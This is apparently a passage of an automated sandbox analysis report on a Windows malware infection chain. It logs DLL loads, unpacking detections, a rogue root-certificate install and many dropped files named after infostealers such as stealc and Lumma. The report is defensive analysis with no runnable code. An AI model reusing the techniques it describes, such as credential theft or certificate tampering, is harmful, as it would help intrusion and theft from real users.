Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msisip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wshext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appxsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: opcservices.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: esdsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp

Window found: window name: TMainForm

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fido Video Recorder_is1

Source: file.exe

Static file information: File size 1973760 > 1048576

Source: file.exe

Static PE information: Raw size of ukgzfzxu is bigger than: 0x100000 < 0x1b0400

Source:	Binary string: mozglue.pdbP source: stealc_default2.exe, 00000013.00000002.3061112605.0000000068E3D000.00000002.00000001.01000000.00000021.sdmp
Source:	Binary string: .pdb8 source: axplong.exe, 00000006.00000003.3054813558.0000000001620000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.0000000001620000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: stealc_default2.exe, 00000013.00000002.3061741872.0000000068FFF000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: nss3.pdb source: stealc_default2.exe, 00000013.00000002.3061741872.0000000068FFF000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: mozglue.pdb source: stealc_default2.exe, 00000013.00000002.3061112605.0000000068E3D000.00000002.00000001.01000000.00000021.sdmp
Source:	Binary string: c:\rje\tg\7v\obj\Release\Qrr.pdb source: axplong.exe, 00000006.00000003.3054996905.0000000005F26000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.2999307768.0000000005F2B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138409494.0000000005F2C000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.2998919451.0000000005F23000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.d70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ukgzfzxu:EW;svxbhzsv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ukgzfzxu:EW;svxbhzsv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 2.2.axplong.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ukgzfzxu:EW;svxbhzsv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ukgzfzxu:EW;svxbhzsv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 3.2.axplong.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ukgzfzxu:EW;svxbhzsv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ukgzfzxu:EW;svxbhzsv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe	Unpacked PE file: 23.2.fidovideorecorder32_64.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe

Unpacked PE file: 23.2.fidovideorecorder32_64.exe.400000.0.unpack

.NET source code contains potential unpacker

Source: neon[1].exe.6.dr, c2YQ.cs	.Net Code: o5BJ System.Reflection.Assembly.Load(byte[])
Source: neon.exe.6.dr, c2YQ.cs	.Net Code: o5BJ System.Reflection.Assembly.Load(byte[])

Yara detected Costura Assembly Loader

Source: Yara match	File source: 36.2.rstxdhuj.exe.6610000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000002.3164599118.0000000006610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.3009810672.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: newbundle2[1].exe.6.dr

Static PE information: 0xEAE6B680 [Fri Nov 19 07:02:24 2094 UTC]

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe

Code function: 16_2_001BBDF9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

16_2_001BBDF9

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: newbundle2.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x4f134
Source: gold.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x5aa4a
Source: neon[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x38421f
Source: 12dsvc[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0xe2c06
Source: newbundle2[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x4f134
Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1e8032 should be: 0x1e8323
Source: rstxdhuj[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0xfbc7f
Source: file.exe	Static PE information: real checksum: 0x1e8032 should be: 0x1e8323
Source: 2a8f2f9086.exe.6.dr	Static PE information: real checksum: 0x1e601c should be: 0x1d8601
Source: neon.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x38421f
Source: gold[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x5aa4a

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: ukgzfzxu
Source: file.exe	Static PE information: section name: svxbhzsv
Source: file.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: ukgzfzxu
Source: axplong.exe.0.dr	Static PE information: section name: svxbhzsv
Source: axplong.exe.0.dr	Static PE information: section name: .taggant
Source: 2a8f2f9086.exe.6.dr	Static PE information: section name:
Source: 2a8f2f9086.exe.6.dr	Static PE information: section name: .idata
Source: 2a8f2f9086.exe.6.dr	Static PE information: section name:
Source: 2a8f2f9086.exe.6.dr	Static PE information: section name: ewzoukzh
Source: 2a8f2f9086.exe.6.dr	Static PE information: section name: eahzsgud
Source: 2a8f2f9086.exe.6.dr	Static PE information: section name: .taggant

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0587E090 push es; ret	9_2_0587E0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0587C9C0 push es; ret	9_2_0587C9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0587D871 push es; ret	9_2_0587D880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06B8EFB2 push eax; ret	9_2_06B8EFC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00428E7D push esi; ret	13_2_00428E86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004076E0 push ecx; ret	13_2_004076F3
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 14_2_00EE7333 push 04EC839Eh; mov dword ptr [esp], edi	14_2_00EE733A
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Code function: 15_2_010047D7 push esi; retf 0002h	15_2_010047DA
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Code function: 15_2_0100AD01 pushfd ; retf 0002h	15_2_0100AD02
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Code function: 15_2_0648E060 push es; ret	15_2_0648E070
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Code function: 15_2_0648ECF2 push eax; ret	15_2_0648ED01
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_001AD77C push ecx; ret	16_2_001AD78F
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_0022D77C push ecx; ret	17_2_0022D78F

Source: file.exe	Static PE information: section name: entropy: 7.981135166621274
Source: file.exe	Static PE information: section name: ukgzfzxu entropy: 7.954114494969637
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.981135166621274
Source: axplong.exe.0.dr	Static PE information: section name: ukgzfzxu entropy: 7.954114494969637
Source: 2a8f2f9086.exe.6.dr	Static PE information: section name: entropy: 7.98850986721473
Source: 2a8f2f9086.exe.6.dr	Static PE information: section name: ewzoukzh entropy: 7.954562556297656
Source: rstxdhuj[1].exe.6.dr	Static PE information: section name: .text entropy: 7.989713684706289
Source: gold[1].exe.6.dr	Static PE information: section name: .text entropy: 7.996189613972712
Source: gold.exe.6.dr	Static PE information: section name: .text entropy: 7.996189613972712
Source: 12dsvc[1].exe.6.dr	Static PE information: section name: .text entropy: 7.999068736163035

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\gold[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Fido Video Recorder\is-8M782.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Fido Video Recorder\is-S5HN7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Fido Video Recorder\libssl-1_1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Fido Video Recorder\is-65AJA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Fido Video Recorder\uninstall\is-4OQD3.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Fido Video Recorder\is-NSLMU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Fido Video Recorder\msvcr71.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Fido Video Recorder\msvcp71.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\stealc_default2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	File created: C:\Users\user\AppData\Local\Temp\1000065001\stories.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Fido Video Recorder\is-AMTS2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	File created: C:\Users\user\AppData\Roaming\Ylrdnrwcx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000356001\neon.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe	File created: C:\ProgramData\EBook JS Plugin 9.26.47\EBook JS Plugin 9.26.47.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Fido Video Recorder\Qt5OpenGL.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\LummaC222222[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\rstxdhuj[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\needmoney[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\newbundle2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000354001\c9a37ab27e.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\12dsvc[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Fido Video Recorder\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\neon[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Temp\is-FGF43.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stories[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000065001\stories.exe	File created: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000355001\2a8f2f9086.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Temp\is-FGF43.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Fido Video Recorder\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cccc2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Temp\is-FGF43.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	File created: C:\Users\user\AppData\Local\Temp\svchost015.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Nework[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\crypted[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Fido Video Recorder\is-0DA5B.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	File created: C:\Users\user\AppData\Local\Fido Video Recorder\uninstall\unins000.exe (copy)	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe	File created: C:\ProgramData\EBook JS Plugin 9.26.47\EBook JS Plugin 9.26.47.exe	Jump to dropped file
